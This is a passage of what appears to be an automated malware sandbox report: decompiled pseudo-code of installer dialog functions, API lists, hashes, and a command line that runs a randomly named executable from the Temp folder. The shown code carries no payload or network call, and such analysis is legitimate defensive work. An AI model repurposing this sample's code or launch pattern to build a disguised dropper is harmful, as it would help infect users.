                                      					if(_t138 == 0) {
                                      						L53:
                                      						return E0040462B(_a8, _a12, _a16);
                                      					} else {
                                      						 *_t138(_t166, 1);
                                      						goto L8;
                                      					}
                                      				}
                                      			}













































                                      0x00404ab5
                                      0x00404abb
                                      0x00404ac1
                                      0x00404ace
                                      0x00404adc
                                      0x00404adf
                                      0x00404ae7
                                      0x00404aed
                                      0x00404aed
                                      0x00404af9
                                      0x00404afc
                                      0x00404b6a
                                      0x00404b71
                                      0x00404c48
                                      0x00404c4f
                                      0x00404c5e
                                      0x00404c5e
                                      0x00404c62
                                      0x00404c6c
                                      0x00404c79
                                      0x00404c7b
                                      0x00404c7b
                                      0x00404c89
                                      0x00404c90
                                      0x00404c97
                                      0x00404c9a
                                      0x00404cd6
                                      0x00404cd8
                                      0x00404cde
                                      0x00404ce3
                                      0x00404ce7
                                      0x00404ce9
                                      0x00404ce9
                                      0x00404d05
                                      0x00000000
                                      0x00404d07
                                      0x00404d0a
                                      0x00404d18
                                      0x00404d1e
                                      0x00404d1f
                                      0x00404d22
                                      0x00404d25
                                      0x00000000
                                      0x00404d25
                                      0x00404c9c
                                      0x00404c9e
                                      0x00404ca2
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00404ca4
                                      0x00404ca4
                                      0x00404cb1
                                      0x00404cb6
                                      0x00000000
                                      0x00000000
                                      0x00404cba
                                      0x00404cbc
                                      0x00404cbc
                                      0x00404cc5
                                      0x00404cc7
                                      0x00404ccc
                                      0x00404ccf
                                      0x00404cd4
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00404cd4
                                      0x00404d31
                                      0x00404d3b
                                      0x00404d3e
                                      0x00404d41
                                      0x00404d48
                                      0x00404d48
                                      0x00404d4a
                                      0x00404d4a
                                      0x00404d4f
                                      0x00404d51
                                      0x00404d59
                                      0x00404d60
                                      0x00404d62
                                      0x00404d6d
                                      0x00404d6d
                                      0x00404d62
                                      0x00404d7d
                                      0x00404d87
                                      0x00404d8f
                                      0x00404daa
                                      0x00404d91
                                      0x00404d9a
                                      0x00404d9a
                                      0x00404d8f
                                      0x00404daf
                                      0x00404db4
                                      0x00404db9
                                      0x00404dc2
                                      0x00404dc2
                                      0x00404dcb
                                      0x00404dcd
                                      0x00404dcd
                                      0x00404dd9
                                      0x00404de1
                                      0x00404deb
                                      0x00404deb
                                      0x00404df0
                                      0x00000000
                                      0x00404df0
                                      0x00404c9a
                                      0x00404c51
                                      0x00404c58
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00404c58
                                      0x00404b77
                                      0x00404b80
                                      0x00404b9a
                                      0x00404b9f
                                      0x00404ba9
                                      0x00404bb0
                                      0x00404bbc
                                      0x00404bbf
                                      0x00404bc2
                                      0x00404bc9
                                      0x00404bd1
                                      0x00404bd4
                                      0x00404bd8
                                      0x00404bdf
                                      0x00404be7
                                      0x00404c41
                                      0x00404be9
                                      0x00404bea
                                      0x00404bf1
                                      0x00404bfb
                                      0x00404c03
                                      0x00404c10
                                      0x00404c24
                                      0x00404c28
                                      0x00404c28
                                      0x00404c24
                                      0x00404c2d
                                      0x00404c3a
                                      0x00404c3a
                                      0x00404be7
                                      0x00000000
                                      0x00404b9f
                                      0x00404b8d
                                      0x00000000
                                      0x00000000
                                      0x00404b93
                                      0x00000000
                                      0x00404afe
                                      0x00404b0b
                                      0x00404b14
                                      0x00404b21
                                      0x00404b21
                                      0x00404b28
                                      0x00404b2e
                                      0x00404b37
                                      0x00404b3a
                                      0x00404b3d
                                      0x00404b45
                                      0x00404b48
                                      0x00404b4b
                                      0x00404b51
                                      0x00404b58
                                      0x00404b5f
                                      0x00404df6
                                      0x00404e08
                                      0x00404b65
                                      0x00404b68
                                      0x00000000
                                      0x00404b68
                                      0x00404b5f

                                      APIs
                                      • GetDlgItem.USER32(?,000003FB), ref: 00404B04
                                      • SetWindowTextW.USER32 ref: 00404B2E
                                      • SHBrowseForFolderW.SHELL32(?), ref: 00404BDF
                                      • CoTaskMemFree.OLE32(00000000), ref: 00404BEA
                                      • lstrcmpiW.KERNEL32("C:\Users\user\AppData\Local\Temp\efwhixxln.exe" C:\Users\user\AppData\Local\Temp\ozirvdg.dl,00423748,00000000,?,?), ref: 00404C1C
                                      • lstrcatW.KERNEL32 ref: 00404C28
                                      • SetDlgItemTextW.USER32 ref: 00404C3A
                                        • Part of subcall function 00405CAC: GetDlgItemTextW.USER32 ref: 00405CBF
                                        • Part of subcall function 004068EF: CharNextW.USER32(?), ref: 00406952
                                        • Part of subcall function 004068EF: CharNextW.USER32(?), ref: 00406961
                                        • Part of subcall function 004068EF: CharNextW.USER32(?), ref: 00406966
                                        • Part of subcall function 004068EF: CharPrevW.USER32(?,?), ref: 00406979
                                      • GetDiskFreeSpaceW.KERNEL32(00421718,?,?,0000040F,?,00421718,00421718,?,00000001,00421718,?,?,000003FB,?), ref: 00404CFD
                                      • MulDiv.KERNEL32 ref: 00404D18
                                        • Part of subcall function 00404E71: lstrlenW.KERNEL32(00423748,00423748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F12
                                        • Part of subcall function 00404E71: wsprintfW.USER32 ref: 00404F1B
                                        • Part of subcall function 00404E71: SetDlgItemTextW.USER32 ref: 00404F2E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.928079928.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000005.00000002.927960888.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928099284.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928188834.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                      Similarity
                                      • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                      • String ID: "C:\Users\user\AppData\Local\Temp\efwhixxln.exe" C:\Users\user\AppData\Local\Temp\ozirvdg.dl$A$H7B
                                      • API String ID: 2624150263-2760421801
                                      • Opcode ID: cafbbb3b6b33e648c9f94ba13bd1897e858c1dbc17bb594ac49896ccdcf60781
                                      • Instruction ID: 9155a42c54a3203d4d9709c494e168d8d926bd307d67cbb08bf4d9f42020e7e3
                                      • Opcode Fuzzy Hash: cafbbb3b6b33e648c9f94ba13bd1897e858c1dbc17bb594ac49896ccdcf60781
                                      • Instruction Fuzzy Hash: 94A171F1900219ABDB11EFA5CD41AAFB7B8EF84315F11843BF601B62D1D77C8A418B69
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 67%
                                      			E004021AA() {
                                      				signed int _t52;
                                      				void* _t56;
                                      				intOrPtr* _t60;
                                      				intOrPtr _t61;
                                      				intOrPtr* _t62;
                                      				intOrPtr* _t64;
                                      				intOrPtr* _t66;
                                      				intOrPtr* _t68;
                                      				intOrPtr* _t70;
                                      				intOrPtr* _t72;
                                      				intOrPtr* _t74;
                                      				intOrPtr* _t76;
                                      				intOrPtr* _t78;
                                      				intOrPtr* _t80;
                                      				void* _t83;
                                      				intOrPtr* _t91;
                                      				signed int _t101;
                                      				signed int _t105;
                                      				void* _t107;
                                      
                                      				 *((intOrPtr*)(_t107 - 0x10)) = E00402DA6(0xfffffff0);
                                      				 *((intOrPtr*)(_t107 - 0x44)) = E00402DA6(0xffffffdf);
                                      				 *((intOrPtr*)(_t107 - 8)) = E00402DA6(2);
                                      				 *((intOrPtr*)(_t107 - 0x4c)) = E00402DA6(0xffffffcd);
                                      				 *((intOrPtr*)(_t107 - 0xc)) = E00402DA6(0x45);
                                      				_t52 =  *(_t107 - 0x20);
                                      				 *(_t107 - 0x50) = _t52 & 0x00000fff;
                                      				_t101 = _t52 & 0x00008000;
                                      				_t105 = _t52 >> 0x0000000c & 0x00000007;
                                      				 *(_t107 - 0x40) = _t52 >> 0x00000010 & 0x0000ffff;
                                      				if(E00405FAE( *((intOrPtr*)(_t107 - 0x44))) == 0) {
                                      					E00402DA6(0x21);
                                      				}
                                      				_t56 = _t107 + 8;
                                      				__imp__CoCreateInstance(0x4084e4, _t83, 1, 0x4084d4, _t56);
                                      				if(_t56 < _t83) {
                                      					L14:
                                      					 *((intOrPtr*)(_t107 - 4)) = 1;
                                      					_push(0xfffffff0);
                                      				} else {
                                      					_t60 =  *((intOrPtr*)(_t107 + 8));
                                      					_t61 =  *((intOrPtr*)( *_t60))(_t60, 0x4084f4, _t107 - 0x38);
                                      					 *((intOrPtr*)(_t107 - 0x18)) = _t61;
                                      					if(_t61 >= _t83) {
                                      						_t64 =  *((intOrPtr*)(_t107 + 8));
                                      						 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t64 + 0x50))(_t64,  *((intOrPtr*)(_t107 - 0x44)));
                                      						if(_t101 == _t83) {
                                      							_t80 =  *((intOrPtr*)(_t107 + 8));
                                      							 *((intOrPtr*)( *_t80 + 0x24))(_t80, 0x436000);
                                      						}
                                      						if(_t105 != _t83) {
                                      							_t78 =  *((intOrPtr*)(_t107 + 8));
                                      							 *((intOrPtr*)( *_t78 + 0x3c))(_t78, _t105);
                                      						}
                                      						_t66 =  *((intOrPtr*)(_t107 + 8));
                                      						 *((intOrPtr*)( *_t66 + 0x34))(_t66,  *(_t107 - 0x40));
                                      						_t91 =  *((intOrPtr*)(_t107 - 0x4c));
                                      						if( *_t91 != _t83) {
                                      							_t76 =  *((intOrPtr*)(_t107 + 8));
                                      							 *((intOrPtr*)( *_t76 + 0x44))(_t76, _t91,  *(_t107 - 0x50));
                                      						}
                                      						_t68 =  *((intOrPtr*)(_t107 + 8));
                                      						 *((intOrPtr*)( *_t68 + 0x2c))(_t68,  *((intOrPtr*)(_t107 - 8)));
                                      						_t70 =  *((intOrPtr*)(_t107 + 8));
                                      						 *((intOrPtr*)( *_t70 + 0x1c))(_t70,  *((intOrPtr*)(_t107 - 0xc)));
                                      						if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
                                      							_t74 =  *((intOrPtr*)(_t107 - 0x38));
                                      							 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t74 + 0x18))(_t74,  *((intOrPtr*)(_t107 - 0x10)), 1);
                                      						}
                                      						_t72 =  *((intOrPtr*)(_t107 - 0x38));
                                      						 *((intOrPtr*)( *_t72 + 8))(_t72);
                                      					}
                                      					_t62 =  *((intOrPtr*)(_t107 + 8));
                                      					 *((intOrPtr*)( *_t62 + 8))(_t62);
                                      					if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
                                      						_push(0xfffffff4);
                                      					} else {
                                      						goto L14;
                                      					}
                                      				}
                                      				E00401423();
                                      				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t107 - 4));
                                      				return 0;
                                      			}






















                                      0x004021b3
                                      0x004021bd
                                      0x004021c7
                                      0x004021d1
                                      0x004021dc
                                      0x004021df
                                      0x004021f9
                                      0x004021fc
                                      0x00402202
                                      0x00402205
                                      0x0040220f
                                      0x00402213
                                      0x00402213
                                      0x00402218
                                      0x00402229
                                      0x00402231
                                      0x004022e8
                                      0x004022e8
                                      0x004022ef
                                      0x00402237
                                      0x00402237
                                      0x00402246
                                      0x0040224a
                                      0x0040224d
                                      0x00402253
                                      0x00402261
                                      0x00402264
                                      0x00402266
                                      0x00402271
                                      0x00402271
                                      0x00402276
                                      0x00402278
                                      0x0040227f
                                      0x0040227f
                                      0x00402282
                                      0x0040228b
                                      0x0040228e
                                      0x00402294
                                      0x00402296
                                      0x004022a0
                                      0x004022a0
                                      0x004022a3
                                      0x004022ac
                                      0x004022af
                                      0x004022b8
                                      0x004022be
                                      0x004022c0
                                      0x004022ce
                                      0x004022ce
                                      0x004022d1
                                      0x004022d7
                                      0x004022d7
                                      0x004022da
                                      0x004022e0
                                      0x004022e6
                                      0x004022fb
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x004022e6
                                      0x004022f1
                                      0x00402c2d
                                      0x00402c39

                                      APIs
                                      • CoCreateInstance.OLE32(004084E4,?,00000001,004084D4,?), ref: 00402229
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.928079928.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000005.00000002.927960888.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928099284.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928188834.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                      Similarity
                                      • API ID: CreateInstance
                                      • String ID:
                                      • API String ID: 542301482-0
                                      • Opcode ID: 077b7362f6a1d4038be91bf7f4b9e5842d68daf9de23732b557fb751e09ce78c
                                      • Instruction ID: f110e38d5ccd8909b9e85e2ea6b1342c5fae2602ce40754bea02e3b472428d32
                                      • Opcode Fuzzy Hash: 077b7362f6a1d4038be91bf7f4b9e5842d68daf9de23732b557fb751e09ce78c
                                      • Instruction Fuzzy Hash: BC411771A00209EFCF40DFE4C989E9D7BB5BF49304B20456AF505EB2D1DB799981CB94
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 39%
                                      			E0040290B(short __ebx, short* __edi) {
                                      				void* _t21;
                                      
                                      				if(FindFirstFileW(E00402DA6(2), _t21 - 0x2dc) != 0xffffffff) {
                                      					E004065AF( *((intOrPtr*)(_t21 - 0xc)), _t8);
                                      					_push(_t21 - 0x2b0);
                                      					_push(__edi);
                                      					E00406668();
                                      				} else {
                                      					 *((short*)( *((intOrPtr*)(_t21 - 0xc)))) = __ebx;
                                      					 *__edi = __ebx;
                                      					 *((intOrPtr*)(_t21 - 4)) = 1;
                                      				}
                                      				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t21 - 4));
                                      				return 0;
                                      			}




                                      0x00402923
                                      0x0040293e
                                      0x00402949
                                      0x0040294a
                                      0x00402a94
                                      0x00402925
                                      0x00402928
                                      0x0040292b
                                      0x0040292e
                                      0x0040292e
                                      0x00402c2d
                                      0x00402c39

                                      APIs
                                      • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040291A
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.928079928.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000005.00000002.927960888.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928099284.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928188834.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                      Similarity
                                      • API ID: FileFindFirst
                                      • String ID:
                                      • API String ID: 1974802433-0
                                      • Opcode ID: b2f27a8a5f9b700f187602bb898c1293859530a573ae52e9df8ecc114fa703e5
                                      • Instruction ID: b84bdfeecc4e8c0803ac0e71b8711fc90ef1d688bdc4be786e729a17b55638d3
                                      • Opcode Fuzzy Hash: b2f27a8a5f9b700f187602bb898c1293859530a573ae52e9df8ecc114fa703e5
                                      • Instruction Fuzzy Hash: 47F05E71A04105EBDB01DBB4EE49AAEB378EF14314F60457BE101F21D0E7B88E529B29
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 96%
                                      			E00405031(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
                                      				struct HWND__* _v8;
                                      				struct HWND__* _v12;
                                      				long _v16;
                                      				signed int _v20;
                                      				signed int _v24;
                                      				intOrPtr _v28;
                                      				signed char* _v32;
                                      				int _v36;
                                      				signed int _v44;
                                      				int _v48;
                                      				signed int* _v60;
                                      				signed char* _v64;
                                      				signed int _v68;
                                      				long _v72;
                                      				void* _v76;
                                      				intOrPtr _v80;
                                      				intOrPtr _v84;
                                      				void* _v88;
                                      				void* __ebx;
                                      				void* __edi;
                                      				void* __esi;
                                      				signed int _t198;
                                      				intOrPtr _t201;
                                      				long _t207;
                                      				signed int _t211;
                                      				signed int _t222;
                                      				void* _t225;
                                      				void* _t226;
                                      				int _t232;
                                      				long _t237;
                                      				long _t238;
                                      				signed int _t239;
                                      				signed int _t245;
                                      				signed int _t247;
                                      				signed char _t248;
                                      				signed char _t254;
                                      				void* _t258;
                                      				void* _t260;
                                      				signed char* _t278;
                                      				signed char _t279;
                                      				long _t284;
                                      				struct HWND__* _t291;
                                      				signed int* _t292;
                                      				int _t293;
                                      				long _t294;
                                      				signed int _t295;
                                      				void* _t297;
                                      				long _t298;
                                      				int _t299;
                                      				signed int _t300;
                                      				signed int _t303;
                                      				signed int _t311;
                                      				signed char* _t319;
                                      				int _t324;
                                      				void* _t326;
                                      
                                      				_t291 = _a4;
                                      				_v12 = GetDlgItem(_t291, 0x3f9);
                                      				_v8 = GetDlgItem(_t291, 0x408);
                                      				_t326 = SendMessageW;
                                      				_v24 =  *0x42a288;
                                      				_v28 =  *0x42a270 + 0x94;
                                      				if(_a8 != 0x110) {
                                      					L23:
                                      					if(_a8 != 0x405) {
                                      						_t301 = _a16;
                                      					} else {
                                      						_a12 = 0;
                                      						_t301 = 1;
                                      						_a8 = 0x40f;
                                      						_a16 = 1;
                                      					}
                                      					if(_a8 == 0x4e || _a8 == 0x413) {
                                      						_v16 = _t301;
                                      						if(_a8 == 0x413 ||  *((intOrPtr*)(_t301 + 4)) == 0x408) {
                                      							if(( *0x42a279 & 0x00000002) != 0) {
                                      								L41:
                                      								if(_v16 != 0) {
                                      									_t237 = _v16;
                                      									if( *((intOrPtr*)(_t237 + 8)) == 0xfffffe3d) {
                                      										SendMessageW(_v8, 0x419, 0,  *(_t237 + 0x5c));
                                      									}
                                      									_t238 = _v16;
                                      									if( *((intOrPtr*)(_t238 + 8)) == 0xfffffe39) {
                                      										_t301 = _v24;
                                      										_t239 =  *(_t238 + 0x5c);
                                      										if( *((intOrPtr*)(_t238 + 0xc)) != 2) {
                                      											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) & 0xffffffdf;
                                      										} else {
                                      											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) | 0x00000020;
                                      										}
                                      									}
                                      								}
                                      								goto L48;
                                      							}
                                      							if(_a8 == 0x413) {
                                      								L33:
                                      								_t301 = 0 | _a8 != 0x00000413;
                                      								_t245 = E00404F7F(_v8, _a8 != 0x413);
                                      								_t295 = _t245;
                                      								if(_t295 >= 0) {
                                      									_t94 = _v24 + 8; // 0x8
                                      									_t301 = _t245 * 0x818 + _t94;
                                      									_t247 =  *_t301;
                                      									if((_t247 & 0x00000010) == 0) {
                                      										if((_t247 & 0x00000040) == 0) {
                                      											_t248 = _t247 ^ 0x00000001;
                                      										} else {
                                      											_t254 = _t247 ^ 0x00000080;
                                      											if(_t254 >= 0) {
                                      												_t248 = _t254 & 0x000000fe;
                                      											} else {
                                      												_t248 = _t254 | 0x00000001;
                                      											}
                                      										}
                                      										 *_t301 = _t248;
                                      										E0040117D(_t295);
                                      										_a12 = _t295 + 1;
                                      										_a16 =  !( *0x42a278) >> 0x00000008 & 0x00000001;
                                      										_a8 = 0x40f;
                                      									}
                                      								}
                                      								goto L41;
                                      							}
                                      							_t301 = _a16;
                                      							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
                                      								goto L41;
                                      							}
                                      							goto L33;
                                      						} else {
                                      							goto L48;
                                      						}
                                      					} else {
                                      						L48:
                                      						if(_a8 != 0x111) {
                                      							L56:
                                      							if(_a8 == 0x200) {
                                      								SendMessageW(_v8, 0x200, 0, 0);
                                      							}
                                      							if(_a8 == 0x40b) {
                                      								_t225 =  *0x42372c;
                                      								if(_t225 != 0) {
                                      									ImageList_Destroy(_t225);
                                      								}
                                      								_t226 =  *0x423740;
                                      								if(_t226 != 0) {
                                      									GlobalFree(_t226);
                                      								}
                                      								 *0x42372c = 0;
                                      								 *0x423740 = 0;
                                      								 *0x42a2c0 = 0;
                                      							}
                                      							if(_a8 != 0x40f) {
                                      								L90:
                                      								if(_a8 == 0x420 && ( *0x42a279 & 0x00000001) != 0) {
                                      									_t324 = (0 | _a16 == 0x00000020) << 3;
                                      									ShowWindow(_v8, _t324);
                                      									ShowWindow(GetDlgItem(_a4, 0x3fe), _t324);
                                      								}
                                      								goto L93;
                                      							} else {
                                      								E004011EF(_t301, 0, 0);
                                      								_t198 = _a12;
                                      								if(_t198 != 0) {
                                      									if(_t198 != 0xffffffff) {
                                      										_t198 = _t198 - 1;
                                      									}
                                      									_push(_t198);
                                      									_push(8);
                                      									E00404FFF();
                                      								}
                                      								if(_a16 == 0) {
                                      									L75:
                                      									E004011EF(_t301, 0, 0);
                                      									_v36 =  *0x423740;
                                      									_t201 =  *0x42a288;
                                      									_v64 = 0xf030;
                                      									_v24 = 0;
                                      									if( *0x42a28c <= 0) {
                                      										L86:
                                      										if( *0x42a31e == 0x400) {
                                      											InvalidateRect(_v8, 0, 1);
                                      										}
                                      										if( *((intOrPtr*)( *0x42923c + 0x10)) != 0) {
                                      											E00404F3A(0x3ff, 0xfffffffb, E00404F52(5));
                                      										}
                                      										goto L90;
                                      									}
                                      									_t292 = _t201 + 8;
                                      									do {
                                      										_t207 =  *((intOrPtr*)(_v36 + _v24 * 4));
                                      										if(_t207 != 0) {
                                      											_t303 =  *_t292;
                                      											_v72 = _t207;
                                      											_v76 = 8;
                                      											if((_t303 & 0x00000001) != 0) {
                                      												_v76 = 9;
                                      												_v60 =  &(_t292[4]);
                                      												_t292[0] = _t292[0] & 0x000000fe;
                                      											}
                                      											if((_t303 & 0x00000040) == 0) {
                                      												_t211 = (_t303 & 0x00000001) + 1;
                                      												if((_t303 & 0x00000010) != 0) {
                                      													_t211 = _t211 + 3;
                                      												}
                                      											} else {
                                      												_t211 = 3;
                                      											}
                                      											_v68 = (_t211 << 0x0000000b | _t303 & 0x00000008) + (_t211 << 0x0000000b | _t303 & 0x00000008) | _t303 & 0x00000020;
                                      											SendMessageW(_v8, 0x1102, (_t303 >> 0x00000005 & 0x00000001) + 1, _v72);
                                      											SendMessageW(_v8, 0x113f, 0,  &_v76);
                                      										}
                                      										_v24 = _v24 + 1;
                                      										_t292 =  &(_t292[0x206]);
                                      									} while (_v24 <  *0x42a28c);
                                      									goto L86;
                                      								} else {
                                      									_t293 = E004012E2( *0x423740);
                                      									E00401299(_t293);
                                      									_t222 = 0;
                                      									_t301 = 0;
                                      									if(_t293 <= 0) {
                                      										L74:
                                      										SendMessageW(_v12, 0x14e, _t301, 0);
                                      										_a16 = _t293;
                                      										_a8 = 0x420;
                                      										goto L75;
                                      									} else {
                                      										goto L71;
                                      									}
                                      									do {
                                      										L71:
                                      										if( *((intOrPtr*)(_v28 + _t222 * 4)) != 0) {
                                      											_t301 = _t301 + 1;
                                      										}
                                      										_t222 = _t222 + 1;
                                      									} while (_t222 < _t293);
                                      									goto L74;
                                      								}
                                      							}
                                      						}
                                      						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
                                      							goto L93;
                                      						} else {
                                      							_t232 = SendMessageW(_v12, 0x147, 0, 0);
                                      							if(_t232 == 0xffffffff) {
                                      								goto L93;
                                      							}
                                      							_t294 = SendMessageW(_v12, 0x150, _t232, 0);
                                      							if(_t294 == 0xffffffff ||  *((intOrPtr*)(_v28 + _t294 * 4)) == 0) {
                                      								_t294 = 0x20;
                                      							}
                                      							E00401299(_t294);
                                      							SendMessageW(_a4, 0x420, 0, _t294);
                                      							_a12 = _a12 | 0xffffffff;
                                      							_a16 = 0;
                                      							_a8 = 0x40f;
                                      							goto L56;
                                      						}
                                      					}
                                      				} else {
                                      					_v36 = 0;
                                      					_v20 = 2;
                                      					 *0x42a2c0 = _t291;
                                      					 *0x423740 = GlobalAlloc(0x40,  *0x42a28c << 2);
                                      					_t258 = LoadImageW( *0x42a260, 0x6e, 0, 0, 0, 0);
                                      					 *0x423734 =  *0x423734 | 0xffffffff;
                                      					_t297 = _t258;
                                      					 *0x42373c = SetWindowLongW(_v8, 0xfffffffc, E0040563E);
                                      					_t260 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
                                      					 *0x42372c = _t260;
                                      					ImageList_AddMasked(_t260, _t297, 0xff00ff);
                                      					SendMessageW(_v8, 0x1109, 2,  *0x42372c);
                                      					if(SendMessageW(_v8, 0x111c, 0, 0) < 0x10) {
                                      						SendMessageW(_v8, 0x111b, 0x10, 0);
                                      					}
                                      					DeleteObject(_t297);
                                      					_t298 = 0;
                                      					do {
                                      						_t266 =  *((intOrPtr*)(_v28 + _t298 * 4));
                                      						if( *((intOrPtr*)(_v28 + _t298 * 4)) != 0) {
                                      							if(_t298 != 0x20) {
                                      								_v20 = 0;
                                      							}
                                      							SendMessageW(_v12, 0x151, SendMessageW(_v12, 0x143, 0, E004066A5(_t298, 0, _t326, 0, _t266)), _t298);
                                      						}
                                      						_t298 = _t298 + 1;
                                      					} while (_t298 < 0x21);
                                      					_t299 = _a16;
                                      					_push( *((intOrPtr*)(_t299 + 0x30 + _v20 * 4)));
                                      					_push(0x15);
                                      					E004045C4(_a4);
                                      					_push( *((intOrPtr*)(_t299 + 0x34 + _v20 * 4)));
                                      					_push(0x16);
                                      					E004045C4(_a4);
                                      					_t300 = 0;
                                      					_v16 = 0;
                                      					if( *0x42a28c <= 0) {
                                      						L19:
                                      						SetWindowLongW(_v8, 0xfffffff0, GetWindowLongW(_v8, 0xfffffff0) & 0x000000fb);
                                      						goto L20;
                                      					} else {
                                      						_t319 = _v24 + 8;
                                      						_v32 = _t319;
                                      						do {
                                      							_t278 =  &(_t319[0x10]);
                                      							if( *_t278 != 0) {
                                      								_v64 = _t278;
                                      								_t279 =  *_t319;
                                      								_v88 = _v16;
                                      								_t311 = 0x20;
                                      								_v84 = 0xffff0002;
                                      								_v80 = 0xd;
                                      								_v68 = _t311;
                                      								_v44 = _t300;
                                      								_v72 = _t279 & _t311;
                                      								if((_t279 & 0x00000002) == 0) {
                                      									if((_t279 & 0x00000004) == 0) {
                                      										 *( *0x423740 + _t300 * 4) = SendMessageW(_v8, 0x1132, 0,  &_v88);
                                      									} else {
                                      										_v16 = SendMessageW(_v8, 0x110a, 3, _v16);
                                      									}
                                      								} else {
                                      									_v80 = 0x4d;
                                      									_v48 = 1;
                                      									_t284 = SendMessageW(_v8, 0x1132, 0,  &_v88);
                                      									_v36 = 1;
                                      									 *( *0x423740 + _t300 * 4) = _t284;
                                      									_v16 =  *( *0x423740 + _t300 * 4);
                                      								}
                                      							}
                                      							_t300 = _t300 + 1;
                                      							_t319 =  &(_v32[0x818]);
                                      							_v32 = _t319;
                                      						} while (_t300 <  *0x42a28c);
                                      						if(_v36 != 0) {
                                      							L20:
                                      							if(_v20 != 0) {
                                      								E004045F9(_v8);
                                      								goto L23;
                                      							} else {
                                      								ShowWindow(_v12, 5);
                                      								E004045F9(_v12);
                                      								L93:
                                      								return E0040462B(_a8, _a12, _a16);
                                      							}
                                      						}
                                      						goto L19;
                                      					}
                                      				}
                                      			}


























































                                      0x00405038
                                      0x00405051
                                      0x00405056
                                      0x0040505e
                                      0x00405064
                                      0x0040507a
                                      0x0040507d
                                      0x004052a8
                                      0x004052af
                                      0x004052c3
                                      0x004052b1
                                      0x004052b3
                                      0x004052b6
                                      0x004052b7
                                      0x004052be
                                      0x004052be
                                      0x004052cf
                                      0x004052dd
                                      0x004052e0
                                      0x004052f6
                                      0x0040536b
                                      0x0040536e
                                      0x00405370
                                      0x0040537a
                                      0x00405388
                                      0x00405388
                                      0x0040538a
                                      0x00405394
                                      0x0040539a
                                      0x0040539d
                                      0x004053a0
                                      0x004053bb
                                      0x004053a2
                                      0x004053ac
                                      0x004053ac
                                      0x004053a0
                                      0x00405394
                                      0x00000000
                                      0x0040536e
